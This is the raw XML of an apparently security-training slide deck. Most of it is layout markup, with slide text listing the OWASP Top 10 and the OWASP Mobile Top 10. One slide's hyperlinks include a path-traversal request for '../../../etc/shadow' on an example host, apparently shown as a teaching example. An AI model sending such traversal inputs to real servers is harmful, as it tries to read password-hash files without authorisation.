                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="2331720" indent="-502920" defTabSz="1300480">
              <a:spcBef>
                <a:spcPts val="10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541"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130048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548" name="Line"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-1" y="1842346"/>
            <a:ext cx="13004802" cy="1"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="63500">
            <a:solidFill>
              <a:srgbClr val="800000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="65023" tIns="65023" rIns="65023" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l" defTabSz="650240">
              <a:defRPr sz="1600">
                <a:latin typeface="Helvetica"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="549" name="Title Text"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="975359" y="-1"/>
            <a:ext cx="11054082" cy="2330028"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="65023" tIns="65023" rIns="65023" bIns="65023">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr defTabSz="1300480">
              <a:defRPr b="1" sz="3800">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Title Text</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="550" name="Body Level One…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="975359" y="2817706"/>
            <a:ext cx="11054082" cy="6935895"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="65023" tIns="65023" rIns="65023" bIns="65023" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="487680" indent="-487680" defTabSz="1300480">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr b="1" sz="3400">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="600075" indent="-485775" defTabSz="1300480">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:defRPr b="1" sz="3400">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="487680" indent="83819" defTabSz="1300480">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr b="1" sz="3400">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1414462" indent="-728662" defTabSz="1300480">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:defRPr b="1" sz="3400">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="487680" indent="655319" defTabSz="1300480">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr b="1" sz="3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551" name="Slide Number"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9320107" y="8779792"/>
            <a:ext cx="3034454" cy="520701"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="65023" tIns="65023" rIns="65023" bIns="65023" anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr algn="r" defTabSz="1300480">
              <a:defRPr sz="1600">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558" name="Title Text"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="650239" y="130952"/>
            <a:ext cx="11704322" cy="2144888"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="65023" tIns="65023" rIns="65023" bIns="65023"/>
          <a:lstStyle>
            <a:lvl1pPr defTabSz="1300480">
              <a:defRPr sz="5800">
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Title Text</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="559" name="Body Level One…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="650239" y="2275839"/>
            <a:ext cx="11704322" cy="7477761"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="65023" tIns="65023" rIns="65023" bIns="65023" anchor="t"/>
          <a:lstStyle>
            <a:lvl1pPr marL="450056" indent="-450056" defTabSz="1300480">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:defRPr sz="4200">
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="885825" indent="-428625" defTabSz="1300480">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="–"/>
              <a:defRPr sz="4200">
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1314450" indent="-400050" defTabSz="1300480">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:defRPr sz="4200">
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1851660" indent="-480060" defTabSz="1300480">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="–"/>
              <a:defRPr sz="4200">
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="2308860" indent="-480060" defTabSz="1300480">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="»"/>
              <a:defRPr sz="42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560" name="Slide Number"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9320107" y="9133162"/>
            <a:ext cx="3034454" cy="333249"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="65023" tIns="65023" rIns="65023" bIns="65023" anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr algn="r" defTabSz="1300480">
              <a:defRPr sz="1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half" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="952500" y="889000"/>
            <a:ext cx="5334000" cy="79756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5092700"/>
            <a:ext cx="5334000" cy="3771900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91439" tIns="45719" rIns="91439" bIns="45719" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="85" name="Image"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="15"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6724518" y="889000"/>
            <a:ext cx="5334001" cy="37719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 Id="rId61" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout60.xml"/><Relationship Id="rId62" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout61.xml"/><Relationship Id="rId63" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout62.xml"/><Relationship Id="rId64"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14.png"/></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59.png"/></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60.png"/></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61.png"/></Relationships>

</file>

<file path=ppt/slides/_rels/slide115.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16.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17.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18.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19.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120.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21.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22.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23.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24.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25.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout57.xml"/></Relationships>

</file>

<file path=ppt/slides/_rels/slide126.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27.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28.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29.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30.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31.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32.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33.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34.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout57.xml"/></Relationships>

</file>

<file path=ppt/slides/_rels/slide135.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36.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37.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38.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39.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40.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41.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42.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?><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62.png"/></Relationships>

</file>

<file path=ppt/slides/_rels/slide143.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44.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145.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout41.xml"/></Relationships>

</file>

<file path=ppt/slides/_rels/slide146.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout39.xml"/></Relationships>

</file>

<file path=ppt/slides/_rels/slide14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6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50.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout39.xml"/></Relationships>

</file>

<file path=ppt/slides/_rels/slide151.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152.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout39.xml"/></Relationships>

</file>

<file path=ppt/slides/_rels/slide153.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout39.xml"/></Relationships>

</file>

<file path=ppt/slides/_rels/slide154.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout39.xml"/></Relationships>

</file>

<file path=ppt/slides/_rels/slide155.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156.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157.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout41.xml"/></Relationships>

</file>

<file path=ppt/slides/_rels/slide158.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout39.xml"/></Relationships>

</file>

<file path=ppt/slides/_rels/slide159.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout39.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60.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout39.xml"/></Relationships>

</file>

<file path=ppt/slides/_rels/slide161.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout39.xml"/></Relationships>

</file>

<file path=ppt/slides/_rels/slide16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6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s>

</file>

<file path=ppt/slides/_rels/slide164.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6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s>

</file>

<file path=ppt/slides/_rels/slide16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tif"/></Relationships>

</file>

<file path=ppt/slides/_rels/slide16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s>

</file>

<file path=ppt/slides/_rels/slide17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tif"/></Relationships>

</file>

<file path=ppt/slides/_rels/slide171.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tif"/></Relationships>

</file>

<file path=ppt/slides/_rels/slide173.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout26.xml"/></Relationships>

</file>

<file path=ppt/slides/_rels/slide174.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout26.xml"/></Relationships>

</file>

<file path=ppt/slides/_rels/slide175.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2.png"/></Relationships>

</file>

<file path=ppt/slides/_rels/slide176.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4.png"/></Relationships>

</file>

<file path=ppt/slides/_rels/slide177.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5.png"/></Relationships>

</file>

<file path=ppt/slides/_rels/slide178.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179.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6.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11.png"/></Relationships>

</file>

<file path=ppt/slides/_rels/slide180.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81.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82.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gif"/></Relationships>

</file>

<file path=ppt/slides/_rels/slide183.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gif"/></Relationships>

</file>

<file path=ppt/slides/_rels/slide18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s>

</file>

<file path=ppt/slides/_rels/slide18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tif"/></Relationships>

</file>

<file path=ppt/slides/_rels/slide18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2.png"/></Relationships>

</file>

<file path=ppt/slides/_rels/slide19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tif"/></Relationships>

</file>

<file path=ppt/slides/_rels/slide19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93.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67.png"/></Relationships>

</file>

<file path=ppt/slides/_rels/slide194.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195.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196.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68.png"/></Relationships>

</file>

<file path=ppt/slides/_rels/slide197.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout41.xml"/></Relationships>

</file>

<file path=ppt/slides/_rels/slide19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9.png"/></Relationships>

</file>

<file path=ppt/slides/_rels/slide199.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0.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0.xml"/></Relationships>

</file>

<file path=ppt/slides/_rels/slide200.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1.png"/></Relationships>

</file>

<file path=ppt/slides/_rels/slide201.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2.png"/></Relationships>

</file>

<file path=ppt/slides/_rels/slide202.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout35.xml"/></Relationships>

</file>

<file path=ppt/slides/_rels/slide203.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3.png"/></Relationships>

</file>

<file path=ppt/slides/_rels/slide204.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout41.xml"/></Relationships>

</file>

<file path=ppt/slides/_rels/slide205.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout41.xml"/></Relationships>

</file>

<file path=ppt/slides/_rels/slide206.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0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tic.com/Customers/admin" TargetMode="Externa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0.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13.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14.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1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1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20.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?><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6.xml"/></Relationships>

</file>

<file path=ppt/slides/_rels/slide221.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4.png"/></Relationships>

</file>

<file path=ppt/slides/_rels/slide223.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5.png"/></Relationships>

</file>

<file path=ppt/slides/_rels/slide224.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6.png"/></Relationships>

</file>

<file path=ppt/slides/_rels/slide225.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hyperlink" Target="http://misc-security.com/file.jsp?file=report.txt" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://misc-security.com/file.jsp?file=**../../../etc/shadow**" TargetMode="External"/></Relationships>

</file>

<file path=ppt/slides/_rels/slide226.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27.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2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3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7.png"/></Relationships>

</file>

<file path=ppt/slides/_rels/slide231.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout35.xml"/></Relationships>

</file>

<file path=ppt/slides/_rels/slide232.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8.png"/></Relationships>

</file>

<file path=ppt/slides/_rels/slide233.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234.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35.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236.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9.png"/></Relationships>

</file>

<file path=ppt/slides/_rels/slide237.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238.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239.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40.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241.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242.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hyperlink" Target="http://someotherserver.com" TargetMode="External"/></Relationships>

</file>

<file path=ppt/slides/_rels/slide243.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244.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout26.xml"/></Relationships>

</file>

<file path=ppt/slides/_rels/slide245.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout35.xml"/></Relationships>

</file>

<file path=ppt/slides/_rels/slide246.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?><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1.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6.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image21.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33.png"/><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1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image40.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image41.png"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image42.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xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image43.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image22.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23.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2.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 Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image46.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image47.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6.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48.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image49.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xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image50.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image5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image" Target="../media/image52.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6.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6.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://toolbox/details/details.aspx?ToolID=22241" TargetMode="Externa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2.jpe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6.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6.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xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3.jpe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5.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63.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63.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1.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6.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60.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57.png"/></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9.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1.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8.png"/></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9" name="OWASP top 10"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>OWASP top 10</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1" name="A1:2017 - Injection…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="95409" y="1270000"/>
            <a:ext cx="7221635" cy="7213600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>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A1:2017 - Injection</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A2:2017 - Broken Authentication</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A3:2017 - Sensitive Data Exposure</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A4:2017 - XML External Entities (XXE)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A5:2017 - Broken Access Control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A6:2017 - Security Misconfiguration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A7:2017 - Cross-Site Scripting (XSS)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A8:2017 - Insecure Deserialization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A9:2017 - Using Components with Known Vulnerabilities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A10:2017 - Insufficient Logging &amp; Monitoring</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p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="592" name="M1: 2016 - Improper Platform Usage…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7386110" y="1270000"/>
            <a:ext cx="5364712" cy="67127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M1: 2016 - Improper Platform Usage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M2: 2016 - Insecure Data Storage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M3: 2016 - Insecure Communication</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M4: 2016 - Insecure Authentication</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M5: 2016 - Insufficient Cryptography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M6: 2016 - Insecure Authorization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M7: 2016 - Client Code Quality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M8: 2016 - Code Tampering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M9: 2016 - Reverse Engineering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M10: 2016 - Extraneous Functionality </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="593" name="Line"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4149609" y="3335696"/>
            <a:ext cx="3250193" cy="729985"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="25400">
            <a:solidFill>
              <a:srgbClr val="FFFB00"/>
            </a:solidFill>
            <a:miter lim="400000"/>
            <a:tailEnd type="triangle"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="50800" tIns="50800" rIns="50800" bIns="50800" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr sz="2400"/>
            </a:pPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="594" name="Line"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="4479340" y="3430043"/>
            <a:ext cx="3064674" cy="236420"/>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595" name="Line"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4479340" y="3710872"/>
            <a:ext cx="3063634" cy="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596" name="Line"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4471531" y="3796911"/>
            <a:ext cx="3081826" cy="599590"/>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597" name="Spoofing"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5039220" y="1414953"/>
            <a:ext cx="19435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Spoofing</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="598" name="Line"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="4478836" y="3039847"/>
            <a:ext cx="3071053" cy="1676153"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="25400">
            <a:solidFill>
              <a:srgbClr val="73FA79"/>
            </a:solidFill>
            <a:miter lim="400000"/>
            <a:tailEnd type="triangle"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="50800" tIns="50800" rIns="50800" bIns="50800" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr sz="2400"/>
            </a:pPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="599" name="Line"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4233901" y="4266674"/>
            <a:ext cx="3081010" cy="591242"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="25400">
            <a:solidFill>
              <a:srgbClr val="FF85FF"/>
            </a:solidFill>
            <a:miter lim="400000"/>
            <a:tailEnd type="triangle"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="50800" tIns="50800" rIns="50800" bIns="50800" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr sz="2400"/>
            </a:pPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="600" name="Line"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2473085" y="2927599"/>
            <a:ext cx="4972286" cy="2620180"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="25400">
            <a:solidFill>
              <a:srgbClr val="FF7E79"/>
            </a:solidFill>
            <a:miter lim="400000"/>
            <a:tailEnd type="triangle"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="50800" tIns="50800" rIns="50800" bIns="50800" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr sz="2400"/>
            </a:pPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="601" name="Line"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="4621412" y="3166847"/>
            <a:ext cx="2787945" cy="2573202"/>
          </a:xfrm>
          <a:prstGeom prst="line">
